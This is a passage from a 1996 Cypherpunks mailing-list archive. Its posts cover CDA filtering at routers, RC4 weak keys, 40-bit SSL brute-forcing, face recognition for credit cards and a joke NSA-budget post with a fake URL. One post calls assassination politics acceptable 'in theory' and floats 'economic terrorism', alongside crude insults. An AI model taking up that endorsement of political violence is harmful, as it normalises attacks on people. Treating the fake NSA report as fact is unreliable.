   built. I would hope that Ascend, with its much larger share of the ISP
   market, and other router companies such as Cisco and Bay Networks,
   would take a principled and likely popular position that the "Exon
   box" is not the way to go about this. I would hope that ISP's would in
   general avoid use of Livingston's products, and also refuse to cave
   into Exon's pressure. I believe, though I may be wrong, that
   Livingston has contributed to the RADIUS technology that many ISP's
   use to manage dialup access charging in a way that is consistent with
   ethe end-to-end philosophy, but any credit they are due is overwhelmed
   by the Exon box insanity.
   
   I do work to protect my children from inappropriate material, but
   pressure from Senators to mandate technically flawed solutions, and
   opportunistic, poorly thought-through technologies from companies like
   Livingston are not helpful.
   
   If you agree, please join me in attempting to call off any tendency
   for other router vendors and protocol designers to develop Exon box
   features. It would seem that the appropriate place for content
   restrictions, such as "parental controls", are in the end-to-end
   agreements between content providers and their users, not in the
   internal switching architecture of the net.
   
   - David P. Reed
   
   Notes: The end-to-end paper was edited and republished in several
   forms (with slight variations in title), generalizing its observations
   to systems beyond the distributed systems that were its original
   focus; the final and most accessible one is: Saltzer, J.H., D.P. Reed,
   and D.D. Clark, End-To-End Arguments in System Design. ACM
   Transactions on Computer Systems, 1984. 2(4) p. 277-288.
   
   I don't have any more details on Livingston's technology or its
   marketing plans than what was presented in Inter@ctive Week. The
   Inter@ctive Week article apparently based its information on 'sources'
   describing a planned announcement, and also quoted Exon's staff. It is
   possible that Livingston will choose not to announce or position its
   technology in this form. It seems less likely that Exon's staff will
   change its position on forcing ISP's to adopt some kind of
   technological solution, however.
   - David
   
   [After considering Dr. Reed's comments, I asked him whether he objects
   to firewalls in general. His reply:
   
   No, I think firewalls of the sort now deployed can be OK (e.g., packet
   filters), as a minimal line of defense. However, they are inherently
   flawed, in ways that are well understood (reading Cheswick and
   Bellovin gives good insight here). Most security threats ultimately
   require end-to-end policies and must be implemented with end-to-end
   solutions. As the paper points out, sometimes one can optimize cost of
   implementing and end-to-end solution by including some functionality
   that is not end-to-end. Firewalls may reduce the cost.
   
   --CEL]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Tue, 9 Apr 1996 23:19:56 +0800
To: cypherpunks@toad.com
Subject: Re: RC4 improvement idea
In-Reply-To: <199604060539.VAA22611@dns1.noc.best.net>
Message-ID: <4kdcad$57@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604060539.VAA22611@dns1.noc.best.net>,
 <jamesd@echeque.com> wrote:
> At 12:01 PM 4/5/96 -0500, Jack Mott wrote:
> >I got a paper from the cryptography technical report server  
> >"http://www.itribe.net/CTRS/" about a weak class of RC4 keys.
> 
> The report was bogus:
> 
> For one key in 256, you can tell what eight bits of the state box are.  
> For one key in 64000 you can tell what sixteen bits of the state box are, 
> and so on and so forth.
> 
> Such keys are not weak.

No, the report was right: the weak keys are real.

For one key in 256, you have a 13.6% chance of recovering 16 bits of
the original key.

On average, the work factor per key recovered is reduced by a factor
of 35 (i.e. the effective keylength is reduced by 5.1 bits) by using
this class of weak keys.
	- quoting from the report

I've experimentally confirmed this effect myself.  Andrew Roos did
some good work.

Take care,
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@dal1820.computek.net
Date: Tue, 9 Apr 1996 22:30:54 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Budget
Message-ID: <199604090919.FAA24636@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


One could only wish... :)
______________________________ Reply Separator _________________________________
Subject:  NSA Budget
Sent To:  cypherpunks@toad.com
Author:   cpunk@remail.ecafe.org
Reply To: cpunk@remail.ecafe.org
Date:     4/9/96 3:07:19 AM


>Is there a public release of the NSA's annual Budget.
>If so is there a quarterly release. -Erinn

-----

   Yes, there are annual and quarterly reports released to the
   public which describe in meticulous detail expenditures for
   the agency's program, personnel and equipment:

   1. The program of services and information supplied to
      government and other intelligence organizations, US and
      foreign, with terms of each client contract.

   2. US employees, their organization, skills, duties and
      longevity of service; their names, ranks, identification
      codes, secure communication methods and home addresses;
      the location of workplaces; the continued training each
      is scheduled to receive; leaves of absence and
      destinations while absent.

   3. Foreign nationals covertly employed worldwide, with
      information on each as per 2.

   4. A comprehensive listing of all types of world-wide
      equipment operated; its detailed design, function and
      output; where it is located; its designers,
      manufacturers and purchase cost; its schedule of
      amortization; and its schedule for replacement and/or
      upgrade, with fifteen-year projected procurement.

   5. Special short- and long-term contracts with governmental
      and non-governmental organizations, US and foreign for
      one-time projects, by goal, personnel and equipment.

   6. Special projects with other US and foreign counter-
      intelligence to issue disinformation about the agency.

   7. Special section on world-wide US and foreign cryptology:
      cryptanalysis, cryptography, steganography, codes,
      cyphers, glyphs, mimes; each ranked for security and
      ease of cracking; governmental and non-governmental
      parties using each; names of cooperative and resistant
      cryptographers and cooperating pseudo-cryptographers.

   8. Sub-section on methods of Internet traffic and language
      analysis; operation and surveillance of anonymous
      remailers, bulletin boards and mail lists; lists of
      cooperative and resistant educational institutions and
      commercial organizations.

   9. Appendices on: black operations; transparent operations;
      methods for managing cooperative and resistant
      governmental and non-governmental persons.

   The public is invited to study and/or download these
   reports anonymously at:

      http://nsa.dod.gov/~reports/quarterly.txt









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 10 Apr 1996 01:51:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Subject: Re: They're running scared.
Message-ID: <199604090637.XAA17445@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



** Reply to note from jim bell <jimbell@pacifier.com> 04/08/96 09:53am  
-0800 
 
= At 04:33 PM 4/8/96 GMT, attila wrote: 
= >** Reply to note from jim bell <jimbell@pacifier.com> 04/07/96   
8:32pm -0800 
= > 
= >Jim: 
= > 
= >    a very sensible article. 
=  
= And it is the kind of article that you would never have seen in the  
= "mainstream press" more than 2-3 years ago, and probably not before  
the  
= middle of 1995.  One of the implicit functions of the press has been  
to make  
= it appear that there is no reasonable opposition to the government in  
total.  
=  Now, they have begun to admit that ever larger proportions of the  
= population are soured on the whole concept. 
=  
 
    Time's dual attack on Hillary, one orchestrated by someone she  
tried to control, the other just pure analysis of the situation is very  
surprising. they are part of the big-money NWO whose "duty" is to keep  
the sheep informed of the will of the government (and make it appear  
benevolent. 
 
	However, let's face it, Hillary has guts: 
 
   	    "Bill Gates is greedy because he has amassed a fortune of 
        	US$ 15,000,000,000 ($15 billion) 
   	    but the US Government is a helpful Village because it takes 
        	US$ 1,400,000,000,000 ($1.4 trillion) from us each year 
        	and does good things with it." 
                	--Hillary Clinton 
 
    that takes one bitch of a person to make that arrogant statement  
--and the  cover picture tells it all --ridden hard and put away wet  
many, many times --and not in the conventional sense.  Susan Thosases  
and she make a real pair. 
    Their actions, or those of Bubba and the rest of the CFR of which  
george Bush is the hatchet man, show an absolute contempt for the  
Constitution. 
 
=  
= >    not to be critical over your work in general, but your polemics  
and  
= too-far   
= >radicalism makes it hard to swallow.  
=  
= I admit to my polemics.  However, saying my position is "too far  
radicalism"  
= is quite relative.  The average person today is a product of a system  
which,  
= in effect, has brainwashed him (to use an old, out-of-favor term) to  
believe  
= in the idea that the government has the authority to run just about  
= everything it chooses to.  I, and increasing numbers of people,  
disagree.    
= If you have an alternative solution to the "government problem" I'm  
anxious  
= to see it.  Relative to the sheep, I am "radical," but compared to  
people  
= who do indeed see there is a problem, I think I fit right in. 
=  
= > I may be an anarchist at heart, but   
= >anarchy explicitely implies personal responsibility --which few  
people have.    
= >the trick is to figure how the idealism of anarchy can survive in a  
society of   
= >non-responsible individuals. 
=  
= With all due respect, I think I've already figured it out.  At least,  
I  
= discovered a path that we must at least investigate, because it could  
lead  
= us to the goal. 
 
    politics of assassination?  hired guns?  I do not think I would  
have any difficulty with the concept in theory; just that we would run  
out of targets too soon and be forced back to economic terrorism.  I do  
know, WITHOUT A DOUBT, that I will NOT participate in such a matter. 

    The prophet, Joseph Smith said: 
 
	    The Constitution is not a law, but it empowers the people  
	to make laws... The Constitution tells us what shall not be  
	lawful tender... The legislture has ceded up to us the  
	privilege of enacting such laws as are not inconsitent with the  
	Constitution of the United States... The different states, and 
	even the Congress itself have passed many laws diametrically  
	contrary to the Constitution of the United States. 
	    ...Shall we be such fools as to be governed by its laws,  
	which are unconstitutional? No!... The Constitution  
	acknowledges that the people have all the power not reserved to  
	itself. I am a lawyer. I am a big lawyer and comprehend heaven,  
	earth, and hell. to bring forth knowledge that shall  
	cover up all lawyers, doctors, and other big bodies. This is  
	the doctrine of the Constitution, so help me God.... 
 
    Now, this may not agree with your thinking (and there are pages  
more of Joseph Smith's statements on defending the Constitution), but I  
think he hit it on the head.  Secondly, Thomas Jefferson stated: 
 
	    "I hold it that a little rebellion, now and then, 
    	is a good thing, and as necessary in the political 
    	world as storms in the physical... It is a medicine 
    	necessary for the sound health of government" 
        	--Thomas Jefferson (1743-1826) 
 
    or maybe: 
 
	    Democracy is a form of government under which everyone 
    	has the freedom to elect officials to restrict his freedom. 
 
 
    or to put in more succintly, I think an old Doonesbury cartoon that  
had Duke (representing the NRA) testifying before a Senate subcommittee  
summed it up    nicely..... 
 
    	    Senator: "And we and the American people have had enough of  
	you and your fanatic organization!" 
 
	    Duke: "I see Senator, shall I put you down for a million  
	postcards?" 
 
	    Senator: "Don't you threaten me, mister!" 
 
	Politicians only understand one thing. 
 
 
   I am not a pacifist; I do believe in fighting for what is right; I  
did my duty in the 60s (in spades) --I could have asked the Church for  
the CO form; after the way the government used us (particularly the  
"black" battalionsfor which I was the CO) solely to test new weaponry  
and build up the military-industrial economics, by 1980 it hit me as to  
the extent I, and the rest of us, had been betrayed, 
 
    yes, our government has a problem: greed, and power. 
 
    Joseph Smith, however, did say: 
 
	    The Constitution should contain a provision that every  
	officer of the Government who should neglect or refuse to 
	extend the protection guaranteed in the Constitution should be 
	subject to caputal punishment, and then the President of the 
	United States would not say, "Your cause is just, but I  
	can do nothing for you." 
 
    Anarchy which degenerates to mob rule is untenable.  What I do not  
see in your treatises is any planning for the future --once mob rule  
reigns, the next step is tribal councils, chiefs, and chiefs of chiefs  
--and I do not mean elected chiefs. As it has been, it will be.  Man  
never learns from history --he just repeats it. 
 
	 


-- 
  "Don't hunt wild game, hunt lawyers! 
    They provide better sport, 
      suffer from severe overpopulation, 
        and besides, they taste just like chicken!! 




-- 
 Obscenity  is a crutch  for inarticulate motherfuckers.
 Fuck the CDA!

cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 10 Apr 1996 02:16:53 +0800
To: jamesd@echeque.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't   Work
In-Reply-To: <199604090654.XAA16860@dns2.noc.best.net>
Message-ID: <316A5EB3.29AF@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com wrote:
> > If I don't shave over the
> > weekend will my computer know who I am Monday morning?
> 
> Shaving probably will not be a problem, but holding your head at a slightly
> different angle, or having slightly different lighting, or combing your
> hair differently will screw up the system totally, unless the system has
> radically improved since the last time  I read up on it.

There are supposedly some new techniques that look at the infrared 
signature of your face (like, I guess, distribution & position of 
hot & cold spots), and that's less likely to be fooled by facial 
hair and other superficial disguises.  It's probably a fairly simple
technology, and could be applied to the credit card ID problem.

Note that the mag strip encoding, which is clearly not very secure, 
could be replaced by one of the newer optical coding systems.  Those
would probably be somewhat harder to fake (you'd need to manufacture
cards, and probably couldn't simple "re-record" over a stolen one.)

An interesting question, to me, is what is the actual pattern of criminal
activity involving stolen/fake credit cards?  Is it a matter of huge
criminal syndicates creating fake cards, or is it mostly crimes of
opportunity where stolen cards are boldly presented by the thief (or
by someone the thief sold the card to)?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 10 Apr 1996 00:30:47 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Australia's New South Wales tries net-censorship
Message-ID: <199604091200.IAA28410@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 09, 1996 01:47:39, '"Robert A. Rosenberg" <hal9001@panix.com>'
wrote: 
 
 
>At 9:01 4/8/96, Mike Duvos wrote: 
> 
>>I'd be interested to know if the courts have ever had a case in 
>>which a person has been declared to have been in "possession" of 
>>illegal material merely by virtue of its momentary presence in 
>>their cache, screen buffer, or usenet spool. 
> 
>If you want a real world analogy, there are cases where overeager USPS 
>Inspectors who want to "get" someone have sent them porno as a Return 
>Receipt Requested Item and then raided before the person had had a chance 
>to open the package. That is possession under the Law. 
> 
 
I think this is more "conspiracy" not "possession" under the law. 
 
Perhaps an attorney on the list could comment. 
 
But I am interested to read more about such "cases." Could R.A. Rosenberg
post the case cites? 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 10 Apr 1996 02:37:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <8lOUXbq00YUvBYs3cV@andrew.cmu.edu>
Message-ID: <316A6175.74DA@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan B. McCullagh wrote:
> The attached paper by Dr. Reed is worth reading -- I haven't seen this
> argument raised before. One portion that I found fascinating was:
> 
>   "It is quite silly to imagine that the Ascend router at the ISP can
>   figure out if it is me or my child generating each packet."
>
> But that's exactly what the defenders of the CDA are claiming! Here's
> some background that might be interesting:

I sent a letter to the Economist last year pointing this out after reading
an article containing the offhand statement, "... and of course it is
entirely feasible to control Internet content" (or something like that).
I don't have those magic two letters at the front of my name though.  It
seems so utterly obvious.  When you connect to an ISP via PPP or SLIP,
all the ISP is doing is routing packets. 

> Chris Hansen from the ACLU told me last Friday: "Olsen is going to push
> this tagging idea that the government has, that you can imbed in your
> tag -- in your address -- an adult or minor tag. They're going to
> suggest that the market will come into existence that will make that
> tagging relevant."

Uhh...  what about the rather obvious problem that some of these new
fangled computers can support an enormous spread of information?  My
web site at io.com has no offensive materials (though I recently rated
it as basically "Satan's Headquarters" via SurfWatch), but other stuff
at io.com may well be offensive.  Packets routed out through io's
interface will of course all come from the same address.

Maybe they're suggesting that every disk block in the universe should have
its own IP address.  Hmm, maybe there's a use after all for those 24 byte 
OSI addresses...

_____c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 10 Apr 1996 07:06:10 +0800
To: <cypherpunks@toad.com>
Subject: [NOISE] Federal Bureau of Indigestion
Message-ID: <v03005f07ad903c476596@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[forwards mercifully elided]

The following is a direct quote from the Center for Strategic and
International Studies report on GLOBAL ORGANIZED CRIME; the author who
introduces the story swears it's true.

FBI agents conducted a raid of a psychiatric hospital in San Diego that was
under investigation for medical insurance fraud. After hours of reviewing
thousands of medical records, the dozens of agents had worked up quite an
appetite. The agent in charge of the investigation called a nearby pizza
parlor with delivery service to order a quick dinner for his colleagues.

The following telephone conversation took place and was recorded by the FBI
because they were taping all conversations at the hospital.

Agent:	   Hello. I would like to order 19 large pizzas and 67 cans of soda.
Pizza Guy: And where would you like them delivered?
Agent:	   We're over at the psychiatric hospital.
PM:	   The psychiatric hospital?
Agent:	   That's right. I'm an FBI agent.
PM:	   You're an FBI agent?
Agent:	   That's correct. Just about everybody here is.
PM:	   And you're at the psychiatric hospital?
Agent:	   That's correct. And make sure you don't go through the front
	   doors. We have them locked. You will have to go around to
	   the back to the service entrance to deliver the pizzas.
PM:	   And you say you're all FBI agents?
Agent:	   That's right. How soon can you have them here?
PM:	   And everyone at the psychiatric hospital is an FBI agent?
Agent:	   That's right. We've been here all day and we're starving.
PM:	   How are you going to pay for all of this?
Agent:	   I have my checkbook right here.
PM:	   And you're _all_ FBI agents?
Agent:	   That's right. Everyone here is an FBI agent. Can you remember
	   to bring the pizzas and sodas to the service entrance in the rear?
	   We have the front doors locked.
Pizza Guy: I don't _think_ so...  >click<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 10 Apr 1996 07:47:17 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <199604091714.KAA27317@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:51 AM 4/9/96 -0400, Declan B. McCullagh wrote:
>...
>The DoJ and Taylor are going to argue that IP V6 can include such an
>adult/minor tag in each datagram! One of their key witnesses is Dan
>Olsen, the head of the computer science department at Brigham Young
>University and the incoming director of the Human Computer Interaction
>Institute at CMU.

Declan - 

One of the migration paths suggested for IPV4 to IPV6 migration is to
tunnel IPV4 packets within IPV6 packets.  IPV4 packets do not provide for
an adult/minor tag, so until the transition to IPV6 is fairly well along,
this approach will be ineffective.

If the people who are worried about minor's accessing smut want something
this century, they should go with PICS.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Wed, 10 Apr 1996 06:52:15 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <199604091623.JAA05150@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Time May Wrote:

>Maybe these dweebs are posting from an alternate universe? A universe in
>which not even messages explaining that "unsubscrive," "unsuscribe,"
>"undescribe," "unscribe," and "unimbibe" are not valid alternate spellings
>of "unsubscribe."
>
>I've copied my short explanation of how to subscribe and unsubcribe too
>many times to do it again; and it is clear that these folks are either
>doing this out of spite, are not reading any of the messages we send them,
>or think it funny.

I agree with you to a point, Tim.  They probably haven't read the 
messages about how to properly unsubscrive.  Not because they are 
dweebs or because they think it's funny.  they probably haven't read 
the messages because they have 2 or 3 thousand messages in their 
inbox and they're all from cpunks.  Unfortunately, this time, I have 
to give them the benefit of the doubt for being ignorant.  I don't 
think they're being vindictive.

How many of them have posted Unsub messages after being told the 
proper way to unsub?

Brad


This may kill off the Cypherpunks list even where Detweiler's massive rants
failed. (Now that Detweiler's cabin in Montana has been raided, and one of
his tentacles carried off, who will fill his shoes? Vlad the VZNuri is well
on his way to matching Detweiler's volume, if not his obsessiveness.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 10 Apr 1996 12:19:48 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Bank transactions on Internet
Message-ID: <199604091732.KAA29261@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 AM 4/9/96 -0700, Steve Reid wrote:
>> Is it really that easy to break 40-bit? Don't you need access to a "fair
>> amount of cpu power" to brute force crack 40bit? 
>
>I remember reading a recent paper at this URL:
>  http://theory.lcs.mit.edu/~rivest/bsa-final-report.ascii
>They mentioned a Field Programmable Gate Array (FPGA), specifically a
>board-mounted AT&T Orca chip available for around $400. They said it could
>crack a 40-bit key in 5 hours (average). Sounds like anyone with root
>access on a major internet node could make a significant profit stealing
>credit card numbers.
>
>The FPGA sounds like a very interesting device, with quite a few
>legitimate uses... Has anyone out there seen one of these? 

I was hoping a hardware type would answer this question, and give
references to manufacture's spec sheets, but not having seen such an
answer, here is a software person's answer.

Gate arrays are a common part of complex electronics.  If you are viewing
this answer on a screen, it is quite probable that there is one right
before your nose.  They come in two basic forms, mask programmed and field
programmed.  Mask programmed gate arrays are an array of logic gates, which
are "programmed" to an application by a final metalization layer.  They are
quite inexpensive when ordered in quantity.  Field Programmed Gate Arrays
(FPGAs) are designed for prototyping designs, and can programmed
electrically.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 10 Apr 1996 02:59:32 +0800
To: hal9001@panix.com>
Subject: Re: Australia's New South Wales tries net-censorship
In-Reply-To: <v02140b01ad8f39982775@[166.84.254.3]>
Message-ID: <UlOamXW00YUvE5qMUy@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Apr-96 Re: Australia's New South
W.. by Robert Rosenberg@panix.c 
> If you want a real world analogy, there are cases where overeager USPS
> Inspectors who want to "get" someone have sent them porno as a Return
> Receipt Requested Item and then raided before the person had had a chance
> to open the package. That is possession under the Law.


That is also one of the times the Feds are permitted to allow child porn
out of their possession -- when they send it to someone via USPS and are
waiting to spring on the unfortunate perp as he or she is opening it.

This from conversations with former Federal prosecutors.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anton Rager" <arager@hibbertco.com>
Date: Wed, 10 Apr 1996 08:45:40 +0800
To: cypherpunks@toad.com
Subject: RE: NSA Budget - NOT!
Message-ID: <n1383078154.35440@imailgw.hibbertco.com>
MIME-Version: 1.0
Content-Type: text/plain


Wouldn't it be great if it were true!!!!!!! -- sorry folks -- doesn't seem to
exist

1. - No domain of dod.gov -- there is info for nsa.gov...just not dod.gov
2. - No valid URL of http://nsa.dod.gov/~reports/quarterly.txt -- no page
returned


This must be a joke....I was gullible enough to try anyway.


____________ Original Message Follows _____________________________________


   Yes, there are annual and quarterly reports released to the
   public which describe in meticulous detail expenditures for
   the agency's program, personnel and equipment:

   1. The program of services and information supplied to
      government and other intelligence organizations, US and
      foreign, with terms of each client contract.

   2. US employees, their organization, skills, duties and
      longevity of service; their names, ranks, identification
      codes, secure communication methods and home addresses;
      the location of workplaces; the continued training each
      is scheduled to receive; leaves of absence and
      destinations while absent.

   3. Foreign nationals covertly employed worldwide, with
      information on each as per 2.

   4. A comprehensive listing of all types of world-wide
      equipment operated; its detailed design, function and
      output; where it is located; its designers,
      manufacturers and purchase cost; its schedule of
      amortization; and its schedule for replacement and/or
      upgrade, with fifteen-year projected procurement.

   5. Special short- and long-term contracts with governmental
      and non-governmental organizations, US and foreign for
      one-time projects, by goal, personnel and equipment.

   6. Special projects with other US and foreign counter-
      intelligence to issue disinformation about the agency.

   7. Special section on world-wide US and foreign cryptology:
      cryptanalysis, cryptography, steganography, codes,
      cyphers, glyphs, mimes; each ranked for security and
      ease of cracking; governmental and non-governmental
      parties using each; names of cooperative and resistant
      cryptographers and cooperating pseudo-cryptographers.

   8. Sub-section on methods of Internet traffic and language
      analysis; operation and surveillance of anonymous
      remailers, bulletin boards and mail lists; lists of
      cooperative and resistant educational institutions and
      commercial organizations.

   9. Appendices on: black operations; transparent operations;
      methods for managing cooperative and resistant
      governmental and non-governmental persons.

   The public is invited to study and/or download these
   reports anonymously at:

      http://nsa.dod.gov/~reports/quarterly.txt








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 10 Apr 1996 10:28:51 +0800
To: cypherpunks@toad.com
Subject: Job at C2.NET
Message-ID: <199604091734.KAA01513@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


        See http://www.c2.net/jobs/


JUNIOR SYSTEM ADMINISTRATOR / TECHNICAL SUPPORT 

     Responsibilities: Responsible for day-to-day administration of
UNIX servers, network, and dialin modem pool. Configure and install
new servers and network connections. Handle account creation, web
server maintanence, DNS setup. Maintain newsserver, webserver,
nameserver. Communicate with customers and respond to customer
inquiries regarding products and services. Perform low-level technical
support for basic customer concerns. Maintain website.

     Requirements: UNIX (SunOS and FreeBSD) administration
experience. Experience with BIND, Apache, INN. Strong C, Perl, general
programming background. Good communication skills.  Experience dealing
with customers and related support issues.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 9 Apr 1996 14:49:27 +0800
To: JR Weaver <weaver@harry.bwi.wec.com>
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604081642.ZM1632@harry.bwi.wec.com>
Message-ID: <Pine.SOL.3.91.960409104403.28771C-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, JR Weaver wrote:
> with SFNB to purchase my own copy of 128-bit Netscape Navigator. You can make
> transactions over the net and SFNB does not limit you to 128-bit. Is it really
> that easy to break 40-bit? Don't you need access to a "fair amount of cpu
> power" to brute force crack 40bit? As far as I know client authentication is
Put put it in a word, 'yes'.

> strictly username & password. What other authentication system exists??
This would be a very good system to attack.

Last year during the 'break SSL export' saga, I was able to seach 2^39 of
the key space mostly using networked workstations that were 486DX50's and
sparc 20's.  This took 2 week and basically I ran for 12 hours each night
and no-one at work really knew I was doing this. Well I now have a pentium
100 and they are starting to appear all over the place, they run my code 3
times faster.  This now means that some-one like me, working in a large
software company, if it was fitted out with lots of pentiums would be able
to definitly get your username and password in less than 10 days with
basically no-one knowing that this had been done. Hell, I still have my
software sitting around, it is automated, it would only take me a
month, with no intervention from me until I get the email with the
results. 

Please remember that I'm not talking about theory.  Besides the person 
working next to me, no-one at work knew I was participating in the brute 
force beaking attempt.  Well this is not totally true, the owner of the SGI 
with 6 R4400 CPU's noticed that I was using a few of the CPU's but they 
did not know what the programs were doing :-).

I would say that RC4 40 should not be used if possible, especially to do 
with anything to do with banking.

eric (just putting in his own 2 certs worth).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Apr 1996 09:44:27 +0800
To: Mike McNally <jamesd@echeque.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't   Work
Message-ID: <m0u6iqv-0008ymC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:57 AM 4/9/96 -0500, Mike McNally wrote:
>jamesd@echeque.com wrote:

>There are supposedly some new techniques that look at the infrared 
>signature of your face (like, I guess, distribution & position of 
>hot & cold spots), and that's less likely to be fooled by facial 
>hair and other superficial disguises.  It's probably a fairly simple
>technology, and could be applied to the credit card ID problem.

I think this is based on looking at your face with near-infrared, not the medium and far (thermal) infrared.  Near infrared is supposed to penetrate flesh far better, so your blood vessels are visible and form a pattern which can be recognized.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 10 Apr 1996 07:08:08 +0800
To: cypherpunks@toad.com
Subject: Open Systems, Closed Systems, & Killer Apps
Message-ID: <2.2.32.19960409153328.0075c2c0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At the Digital Commerce Society of Boston lunch last Tuesday, I had an
epiphany.  I finally got the answer to the great question of our age:  Why
do open systems beat closed systems?  One of the peculiar things about today
is how successful open systems have become.  Closed systems like Communism,
X.25, and IBM have fallen to markets, TCP/IP, and the personal computer
respectively.  And this has happened all over the world in institutions with
incredibly varied political and social systems.

We were discussing the Chinese government's proposal to maintain a monopoly
ISP in China that would censor the connections of its peons and as usual I
pointed out the many ways that such restrictions could be overcome (Don't
tell T. May about the draft defining a new MIME type "TCP/IP packet".  I
know he hates MIME).  Which led to the response "Sure a few techies will be
able to overcome the restrictions but the masses won't and the government
won't mind a little leakage as long as they maintain overall control."  To
which I retorted "ordinary people will overcome the technical barriers if
they have sufficient motivation."  Which brought up the subject of what are
the "killer apps" for the Net.  What will motivate people enough to choose
open communication even though it's hard and sometimes even dangerous.

Which led to:

The killer app of open systems is not any particular application it is the
openness, the freedom itself.

The denizens of the DDR had to overcome the Stasi, barbed wire, mines,
walls, tank traps, etc to adopt an open systems architecture.  Learning to
use a few TCP/IP tricks (or building them into applications and using those
applications) is much easier than breaching the Berlin Wall.

Open systems whether MarketEarth or TCP/IP let you trade/communicate at will
with anyone else.  This leads to more trade/communication which leads to
more wealth (or non-monetary satisfaction).  Since people are able to do
more things that they want to do (unblocked by hierarchies) it is only
natural that they are more satisfied with the results (and there are more
results to be satisfied with).  After all, a hierarchical system can only
produce outcomes directed by the hierarchy (in the best case).  But the top
of the hierarchy is much smaller than the bottom of the hierarchy so it can
only think of, deal with, and authorize a small number of activities.  So
the system can only do a few things.

I should have known this before since it is implicit in my favorite article
